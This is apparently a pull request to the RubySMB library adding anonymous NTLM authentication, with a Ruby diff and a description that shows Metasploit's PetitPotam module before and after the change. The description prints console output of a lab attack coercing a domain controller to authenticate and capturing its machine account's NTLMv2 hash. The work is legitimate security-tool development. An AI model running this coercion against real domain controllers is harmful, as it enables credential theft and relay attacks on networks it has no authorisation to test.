### PR TITLE
Support anonymous NTLM authentication

### DIFF
--- a/lib/ruby_smb/client.rb
+++ b/lib/ruby_smb/client.rb
@@ -332,7 +332,7 @@ module RubySMB
       # session setup response is received
       @session_encrypt_data = always_encrypt
 
-      @ntlm_client = Net::NTLM::Client.new(
+      @ntlm_client = NTLM::Client.new(
         @username,
         @password,
         workstation: @local_workstation,
@@ -404,7 +404,7 @@ module RubySMB
       @password          = pass.encode('utf-8') || ''.encode('utf-8')
       @username          = user.encode('utf-8') || ''.encode('utf-8')
 
-      @ntlm_client = Net::NTLM::Client.new(
+      @ntlm_client = NTLM::Client.new(
           @username,
           @password,
           workstation: @local_workstation,

--- a/lib/ruby_smb/ntlm.rb
+++ b/lib/ruby_smb/ntlm.rb
@@ -59,3 +59,4 @@ module RubySMB
   end
 end
 
+require 'ruby_smb/ntlm/client'

--- a/lib/ruby_smb/ntlm/client.rb
+++ b/lib/ruby_smb/ntlm/client.rb
@@ -1,0 +1,74 @@
+module RubySMB::NTLM
+  module Message
+    def deflag
+      security_buffers.inject(head_size) do |cur, a|
+        a[1].offset = cur
+        cur += a[1].data_size
+        has_flag?(:UNICODE) ? cur + cur % 2 : cur
+      end
+    end
+
+    def serialize
+      deflag
+      @alist.map { |n, f| f.serialize }.join + security_buffers.map { |n, f| f.value + (has_flag?(:UNICODE) ? "\x00".b * (f.value.length % 2) : '') }.join
+    end
+  end
+
+  class Client < Net::NTLM::Client
+    class Session < Net::NTLM::Client::Session
+      def authenticate!
+        calculate_user_session_key!
+        type3_opts = {
+          :lm_response   => is_anonymous? ? "\x00".b : lmv2_resp,
+          :ntlm_response => is_anonymous? ? '' : ntlmv2_resp,
+          :domain        => domain,
+          :user          => username,
+          :workstation   => workstation,
+          :flag          => (challenge_message.flag & client.flags)
+        }
+        t3 = Net::NTLM::Message::Type3.create type3_opts
+        t3.extend(Message)
+        if negotiate_key_exchange?
+          t3.enable(:session_key)
+          rc4 = OpenSSL::Cipher.new("rc4")
+          rc4.encrypt
+          rc4.key = user_session_key
+          sk = rc4.update exported_session_key
+          sk << rc4.final
+          t3.session_key = sk
+        end
+        t3
+      end
+
+      def is_anonymous?
+        username == '' && password == ''
+      end
+
+      private
+
+      def use_oem_strings?
+        # @see https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/99d90ff4-957f-4c8a-80e4-5bfe5a9a9832
+        !challenge_message.has_flag?(:UNICODE) && challenge_message.has_flag?(:OEM)
+      end
+
+      def calculate_user_session_key!
+        if is_anonymous?
+          # see MS-NLMP section 3.4
+          @user_session_key = "\x00".b * 16
+        else
+          @user_session_key = OpenSSL::HMAC.digest(OpenSSL::Digest::MD5.new, ntlmv2_hash, nt_proof_str)
+        end
+      end
+    end
+
+    def init_context(resp = nil, channel_binding = nil)
+      if resp.nil?
+        @session = nil
+        type1_message
+      else
+        @session = Client::Session.new(self, Net::NTLM::Message.decode64(resp), channel_binding)
+        @session.authenticate!
+      end
+    end
+  end
+end


### PR DESCRIPTION
This adds the changes from WinRM/rubyntlm#45, building on #190. With these changes, we can fix the limitation now, independently of the upstream project. The proposed solution aims to minimize code duplication. I know one option we had discussed was a full fork of Net::NTLM, so anything short of that would duplicate less code.

It allows RubySMB to anonymously authenticate to SMB servers. This is useful in some contexts, notably while exploiting the PetitPotam vulnerability with Metasploit. While this copies a lot of code over, it's not *all* of the code. It also allows the client to be selected. The stock `Net::NTLM` one can be used or the `Ruby::NTLM` one can be which has the added functionality. Should the PR be landed in the future, we should be able to just delete the class bodies.

## Before This Patch
Note that the SMB capture server is running.
```
msf6 auxiliary(scanner/dcerpc/petitpotam) > show options 

Module options (auxiliary/scanner/dcerpc/petitpotam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LISTENER   192.168.159.128  yes       The host listening for the incoming connection
   METHOD     Automatic        yes       The RPC method to use for triggering (Accepted: Automatic, EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv)
   PIPE       lsarpc           yes       The named pipe to use for triggering (Accepted: lsarpc, efsrpc, samr, lsass, netlogon)
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/dcerpc/petitpotam) > set LISTENER 192.168.159.128
LISTENER => 192.168.159.128
msf6 auxiliary(scanner/dcerpc/petitpotam) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(scanner/dcerpc/petitpotam) > run

[-] 192.168.159.10:445    - Auxiliary failed: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[-] 192.168.159.10:445    - Call stack:
[-] 192.168.159.10:445    -   /home/smcintyre/Repositories/metasploit-framework/lib/rex/proto/smb/simple_client.rb:119:in `login'
[-] 192.168.159.10:445    -   /home/smcintyre/Repositories/metasploit-framework/lib/msf/core/exploit/remote/smb/client.rb:152:in `smb_login'
[-] 192.168.159.10:445    -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/scanner/dcerpc/petitpotam.rb:70:in `run_host'
[-] 192.168.159.10:445    -   /home/smcintyre/Repositories/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'
[-] 192.168.159.10:445    -   /home/smcintyre/Repositories/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[-] 192.168.159.10:445    -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:474:in `block in create_with_logging_context'
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >
```

## After This Patch
Note that the SMB capture server is running.
```
msf6 auxiliary(scanner/dcerpc/petitpotam) > run 192.168.159.10

[*] 192.168.159.10:445    - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw

[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.159.10
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:768ec6a80487d57b:c5bae280991f0814f92bbbd5cce710df:0101000000000000806cc79fb364d801fed140b07186c36f000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f005500500007000800806cc79fb364d80106000400020000000800300030000000000000000000000000400000ee85f088ff3d462c936ca209ddc2cc835a9df7261cf96264158f81bf31035a980a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000

[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >
```

## Testing

Use a Domain Controller, because it allows anonymous users to authenticate and connect to pipes. For the same reasons mentioned in #190, it's not really sufficient to just use the `examples/anonymous_auth.rb` script. Use `examples/tree_connect.rb` to prove the session key was calculated correctly.

- [ ] Run `ruby examples/tree_connect.rb --no-smbv1 $target_dc IPC$`, see that it connected successfully
- [ ] Use the `auxiliary/scanner/dcerpc/petitpotam` module, see that it works without authentication (no code changes are necessary over there, just level the credential options blank)